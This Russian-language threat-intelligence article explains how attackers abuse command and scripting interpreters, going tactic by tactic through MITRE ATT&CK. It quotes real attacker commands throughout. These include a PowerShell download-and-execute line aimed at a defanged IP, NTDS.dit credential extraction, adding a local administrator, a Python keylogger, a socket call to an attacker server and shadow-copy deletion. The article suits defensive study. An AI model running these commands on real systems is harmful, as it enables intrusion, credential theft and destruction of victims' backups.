Командные и скриптовые интерпретаторы (например, PowerShell, VBScript, оболочки Unix) необходимы для автоматизации задач системных администраторов и программистов. Однако злоумышленники используют эти инструменты для запуска вредоносного кода на локальных и удаленных системах, выполняя такие действия, как сбор данных, развертывание полезной нагрузки, доступ к конфиденциальной информации и сохранение ее в памяти с помощью вредоносных двоичных файлов, запускаемых при входе в систему.
Использование злоумышленниками командных и скриптовых интерпретаторов
Поскольку эти предустановленные языки напрямую взаимодействуют с API ОС, злоумышленники могут действовать незаметно, избегая слабого мониторинга процессов. Они также используют LOLBins (Living Off the Land Binaries) - родные системные утилиты, которые регулярно используются для загрузки и выполнения файлов, разведки и утечки данных, часто в обход политик безопасности, блокирующих известные вредоносные исполняемые файлы. Хотя техника T1059 привязана к тактике Execution от MITRE ATT&CK, злоумышленники используют родные утилиты ОС в различных тактиках для достижения своих целей.
В приведенных примерах злоумышленники используют различные встроенные утилиты операционной системы (ОС), доступ к которым можно получить через командную строку, для достижения целей, соответствующих каждой тактике в рамках MITRE ATT&CK.
Первоначальный доступ
Векторы первоначального доступа обычно используют встроенные скриптовые механизмы (PowerShell, VBScript, Bash и т. д.) и интерфейсы командной строки (CMD, Terminal) для:
выполнения скриптов-дропперов, которые получают полезную нагрузку вредоносного ПО из контролируемой злоумышленником командно-административной инфраструктуры (C2).
обходить защиту конечных точек с помощью живых двоичных файлов (LOLBins) и бесфайлового исполнения
Обеспечение устойчивости с помощью запланированных задач, модификаций реестра или имплантации папки запуска.
Создание обратных оболочек или C2-маяков для удаленного доступа.
При первоначальной компрометации часто используются легитимные системные интерпретаторы, чтобы скрыть обычные операции и загрузить полезную нагрузку второго этапа.
Например, в феврале 2024 года группа вымогателей Black Basta использовала этот метод после использования уязвимостей в ConnectWise ScreenConnect для получения первоначального доступа к своим целям. Попав внутрь, они использовали PowerShell для успешной загрузки и выполнения вредоносной полезной нагрузки, демонстрируя свою зависимость от продвинутых скриптовых техник проникновения.
Во время этих атак была замечена одна специфическая команда:
| 1 | powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://159[.]65[.]130[.]145:4444/a'))" |
Эта команда начинается с powershell.exe для вызова инструмента, затем следует -nop для отключения загрузки профиля и -w hidden для скрытия окна выполнения, что повышает скрытность. Основная часть, IEX ((new-object net.webclient).downloadstring('hxxp://<ip-адрес>:4444/a')), создает объект WebClient для получения скрипта с заданного URL и немедленно исполняет его с помощью Invoke-Expression (IEX). Этот метод эффективно сочетает удаленную доставку и выполнение полезной нагрузки, используя возможности PowerShell для первоначального доступа и обходя обнаружение.
Подобные методы подчеркивают важность контроля и ограничения использования интерпретаторов сценариев и инструментов командной строки для предотвращения несанкционированного доступа.
Выполнение
Злоумышленники часто используют командные и скриптовые методы для перехвата ввода (ATT&CK T1056). Для этого они могут использовать вредоносное ПО, использующее встроенные среды сценариев, например AppleScript в macOS, что позволяет злоумышленникам обходить средства контроля безопасности и имитировать действия легитимного пользователя.
В 2024 году были особенно активны похитители информации, такие как вредоносная программа Cthulhu Stealer, нацеленная на пользователей macOS. Согласно отчету, опубликованному в сентябре 2024 года, Cthulhu Stealer использовал AppleScript для взаимодействия с приложением System Events в macOS для выполнения вредоносных команд.
Примером такой команды является:
| 1 | osascript -e 'tell application "System Events" to keystroke [вредоносная команда]' |
Здесь команда с нажатием клавиши имитирует ввод заданных данных в текущем сфокусированном окне или процессе. Например, если команда keystroke «sudo rm -rf /», она будет имитировать ввод этой строки, потенциально выполняя вредное действие, если будет запущена с нужными правами. Если злоумышленник может контролировать окружение пользователя или сделать так, чтобы сценарий выглядел легитимным, он может нанести значительный ущерб без ведома пользователя. Это может привести к таким несанкционированным действиям, как перехват клавиатуры, захват экрана и утечка файлов, что позволит злоумышленникам украсть конфиденциальную информацию, например учетные данные для входа в систему и финансовые данные.
Постоянство
Интерпретаторы команд и сценариев - важнейшие инструменты злоумышленников для выполнения и автоматизации механизмов персистенции, позволяющие им поддерживать постоянный доступ к взломанным средам. Эти интерпретаторы позволяют злоумышленникам отдавать команды или запускать скрипты, которые могут изменять конфигурацию системы, развертывать вредоносную полезную нагрузку и автоматизировать задачи, чтобы их присутствие оставалось незамеченным в течение долгого времени.
В ноябре 2024 года исследователи обнаружили, что группа угроз Earth Estries (также известная как Salt Typhoon) использует передовые методы для поддержания устойчивости во взломанных системах. Одна из таких техник включала в себя использование команды для создания вредоносной службы Windows с помощью инструмента Service Control (sc). Эта команда была обнаружена в ходе расследования тактики группы, в частности ее метода развертывания и поддержания устойчивости вредоносного ПО.
Конкретная команда, которую они использовали, была следующей:
| 1 | sc create pasrv binpath= "cmd /c \"start msiexec.exe /y C:\Windows\PLA\Performance[.]dll\"" start= auto displayname= "Microsoft Performance Alerts Server" |
Повышение привилегий
Злоумышленники часто используют инструменты командной строки и сценарии для повышения своих привилегий, что позволяет им обходить средства контроля доступа и получать более высокий уровень контроля над взломанными системами. Такой подход очень эффективен, поскольку использует легитимные функции системы, часто ускользая от обнаружения.
В ноябре 2024 года группа разработчиков вымогательского ПО BianLian продемонстрировала эту тактику, используя уязвимость Windows (CVE-2022-37969) для повышения уровня привилегий на атакуемых системах.
Агенты BianLian использовали командную оболочку Windows для выполнения команды, которая добавляла указанного пользователя в группу локальных администраторов, тем самым предоставляя ему административные привилегии.
| 1 | cmd.exe /c net localgroup administrators <имя пользотвателя> /add |
Этот метод позволил злоумышленникам повысить свои привилегии во взломанной среде, что дало им возможность расширить свои возможности и совершить дальнейшие вредоносные действия, такие как эксфильтрация данных, установление постоянства и развертывание программ-вымогателей. Этот случай подчеркивает постоянную угрозу, которую представляют собой непропатченные уязвимости и стратегическое использование инструментов командной строки в атаках с повышением привилегий.
Уклонение от защиты
Злоумышленники ставят во главу угла уклонение от защиты, чтобы обойти или отключить защитные механизмы, позволяющие им проводить атаки незамеченными. Эта тактика часто предполагает использование встроенных инструментов и методов обфускации, чтобы избежать срабатывания традиционных средств защиты.
Например, в феврале 2024 года группа Rhysida ransomware использовала закодированную команду PowerShell для скрытого манипулирования настройками Windows:
| 1 | powershell.exe -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== |
В расшифрованном виде это означает:
| 1 | start-process -WindowStyle Hidden gpupdate.exe /force |
Эта команда использует PowerShell для запуска gpupdate.exe в скрытом окне, заставляя обновления групповой политики изменять или отключать конфигурации безопасности. Используя доверенные системные инструменты и применяя скрытые, закодированные команды, злоумышленники могут избежать обнаружения и облегчить выполнение вымогательских программ. Этот подход является примером изощренного использования встроенных утилит для обхода традиционных систем мониторинга.
Доступ к учетным данным
Злоумышленники часто используют инструменты командной строки и интерпретаторы сценариев для получения несанкционированного доступа к учетным данным, используя их гибкость и интеграцию с системными утилитами. Эти методы позволяют злоумышленникам взаимодействовать с чувствительными компонентами системы, такими как Active Directory, и извлекать ценные данные, такие как учетные данные пользователей и хэши паролей.
В качестве наглядного примера можно привести случай, когда в октябре 2024 года CISA наблюдала, как иранские злоумышленники использовали команду ntdsutil.exe для извлечения файла NTDS.dit, критически важного компонента Active Directory, содержащего учетные данные пользователей.
| 1 | ntdsutil.exe "ac i ntds" "ifm" "create full c:\temp\ntds" q q |
Команда использует ntdsutil.exe, утилиту управления контроллером домена Windows, для создания полной резервной копии базы данных Active Directory (ntds.dit) вместе с соответствующими файлами реестра. Разберем последовательность команд: «ac i ntds» активирует экземпляр базы данных Active Directory, „ifm“ переходит в режим установки с носителя, а „create full c:\temp\ntds“ создает полную резервную копию в указанном каталоге. Параметр 'q q', идущий в конце, завершает работу как контекста IFM, так и самого ntdsutil.
Эта команда особенно важна с точки зрения безопасности, поскольку она создает копию всей базы данных Active Directory, которая содержит все объекты домена, включая учетные записи пользователей, учетные записи компьютеров и, что особенно важно, хэши паролей. Во вредоносных контекстах злоумышленники часто используют эту технику для утечки учетных данных домена, поскольку файл ntds.dit, сохраненный в резервной копии, может быть обработан в автономном режиме для извлечения хэшей паролей каждого пользователя домена. Этот тип атаки особенно опасен, поскольку обеспечивает постоянный доступ к домену даже при последующей смене паролей, так как исторические хэши паролей также хранятся в базе данных.
Обнаружение
Злоумышленники часто используют инструменты командной строки для сбора информации и установления контроля над взломанными средами, используя их простоту и интеграцию с функциональностью системы.
В ноябре 2024 года группа вымогателей BianLian продемонстрировала эту тактику, используя команды командной оболочки Windows для сбора подробной информации о пользователях и группах домена, что облегчало доступ к учетным данным и позволяло осуществлять латеральное перемещение в сетях жертв.
Эти команды были ключом к стратегии разведки и атаки:
Поиск паролей в файлах
| 1 | findstr /spin "password" *.* > C:\Users\UserName\Music\<file>.txt |
Эта команда ищет слово "password" во всех файлах в текущем каталоге и подкаталогах, перенаправляя результаты в указанный файл. Это помогает злоумышленникам находить пароли, хранящиеся в файлах в открытом виде.
Поиск информации о доменной группе
| 1 2 3 4 5 6 7 8 9 10 11 | # Получение всех доменных групп net group /domain # Список учетных записей в группе 'Domain Admins' net group «Domain Admins» /domain # Список учетных записей в группе 'Domain Computers' группа net группа «Domain Computers» /domain # Список всех пользователей домена net user /domain |
Здесь команды net запрашивали у контроллера домена полную информацию о группах домена, учетных записях с высокими привилегиями (например, 'Domain Admins') и устройствах домена ('Domain Computers'). Эти команды также предоставляли полный список пользователей домена, что позволяло группе определять приоритетные цели для сбора учетных данных и латерального перемещения.
Используя эти легитимные инструменты, участники BianLian эффективно вписывались в обычную административную деятельность, избегая обнаружения и одновременно продвигая свои цели атаки.
Боковое перемещение
Злоумышленники часто используют PowerShell для латерального перемещения, используя его мощные возможности удаленного выполнения команд для расширения своего влияния во взломанных сетях.
В августе 2024 года группа вымогателей Everest использовала команду Invoke-Command в PowerShell для выполнения команд на удаленных системах, обеспечивая тем самым латеральное перемещение во взломанных сетях.
| 1 2 | # Выполнение удаленной команды на целевой системе Invoke-Command -ComputerName <TargetComputer> -ScriptBlock { <Команда> } -Credential <UserCredential> |
Команда указывает целевую систему с помощью параметра -ComputerName, а параметр -ScriptBlock определяет сценарий или команду для удаленного выполнения. Параметр -Credential обеспечивает необходимую аутентификацию, часто с использованием украденных или скомпрометированных учетных данных, для доступа к целевой системе с соответствующими привилегиями. Этот метод позволяет злоумышленникам выполнять такие задачи, как выполнение вредоносных скриптов, изменение конфигурации или развертывание дополнительной полезной нагрузки на удаленных машинах.
Используя встроенную в PowerShell функцию удаленного выполнения, группа эффективно расширяла свой контроль над сетью, избегая обнаружения традиционными механизмами безопасности.
Сбор
Сбор данных - одно из основных действий, выполняемых вредоносным ПО типа CarnavalHeist для получения конфиденциальной информации от жертв. В предоставленном скрипте, опубликованном в мае 2024 года, показано, как CarnavalHeist реализует две критически важные функции для сбора данных: захват экрана и кейлоггинг.
Функция capture_screen использует библиотеку Python PIL.ImageGrab для создания снимков экрана жертвы. Вызывая метод ImageGrab.grab(), она захватывает текущий экран, который затем сохраняется в виде снимка экрана в общей папке жертвы под именем screenshot.png. Эта функция позволяет злоумышленникам отслеживать конфиденциальные действия на экране, такие как сеансы онлайн-банкинга или доступ к конфиденциальным документам, предоставляя им визуальное представление о взаимодействии с жертвой.
| 1 2 3 4 5 6 7 8 9 10 11 12 | from PIL import ImageGrab import keyboard def capture_screen(): screenshot = ImageGrab.grab() screenshot.save("C:\\Users\\Public\\screenshot.png") def log_keys(): keyboard.start_recording() with open("C:\\Users\\Public\\keystrokes.log", "w") as f: for event in keyboard.record("esc"): f.write(f"{event.name}\n") |
Аналогично, функция log_keys демонстрирует возможности CarnavalHeist по записи нажатий клавиш с помощью библиотеки клавиатуры. Она инициирует запись нажатий клавиш, запуская сеанс записи, и записывает перехваченные события в файл журнала keystrokes.log, хранящийся в каталоге public. Скрипт фиксирует каждое нажатие клавиши до тех пор, пока пользователь не нажмет клавишу эвакуации (esc), что позволяет злоумышленникам собирать конфиденциальные данные, такие как пароли, PIN-коды или другие набранные учетные данные.
Все вместе эти функции позволяют CarnavalHeist эффективно собирать критическую информацию со взломанных систем, способствуя достижению своей главной цели - краже финансовых средств путем точного отслеживания учетных данных и сеансов.
Командование и управление
Злоумышленники часто используют интерпретаторы команд и сценариев для создания каналов C2, позволяющих им выполнять команды и сохранять контроль над взломанными системами.
Например, в 2024 году Lazarus Group использовала бэкдор на базе Python под названием BeaverTail. Эта вредоносная программа обеспечивала связь C2, выполняя скрипты Python, которые подключались к контролируемым злоумышленниками серверам. Пример команды, используемой в данном контексте, следующий:
| 1 2 3 | import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('attacker_server_ip', attacker_server_port)) |
Эта команда устанавливает сокетное соединение между взломанным хостом и сервером злоумышленника, позволяя передавать команды и данные.
Воздействие
Злоумышленники часто используют инструменты командной строки и скрипты для атак на механизмы резервного копирования, лишая жертв возможности восстановить данные после атаки.
В мае 2024 года группа вымогателей Akira использовала команду PowerShell для удаления теневых копий тома, критически важной функции Windows для восстановления данных.
Использовалась следующая команда:
| 1 2 | # Удаление теневые копии томов, чтобы затруднить восстановление данных powershell.exe -Команда «Get-WmiObject Win32_Shadowcopy | Remove-WmiObject» |
Эта команда сначала использует Get-WmiObject Win32_Shadowcopy для перечисления всех существующих теневых копий тома, которые являются неотъемлемыми снимками системы, используемыми для резервного копирования. Затем она вызывает Remove-WmiObject для удаления найденных теневых копий, эффективно устраняя жизненно важный механизм восстановления. Выполняя эту команду, операторы Akira гарантируют, что жертвы не смогут восстановить зашифрованные файлы из теневых копий, что усиливает давление, вынуждающее их заплатить выкуп.